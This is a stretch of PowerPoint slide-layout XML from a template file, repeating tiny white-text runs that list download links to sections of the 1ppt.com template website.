              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout253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53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53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53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5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54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54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54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54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54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54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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout254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54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54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54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5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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout255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55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55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55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55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55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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
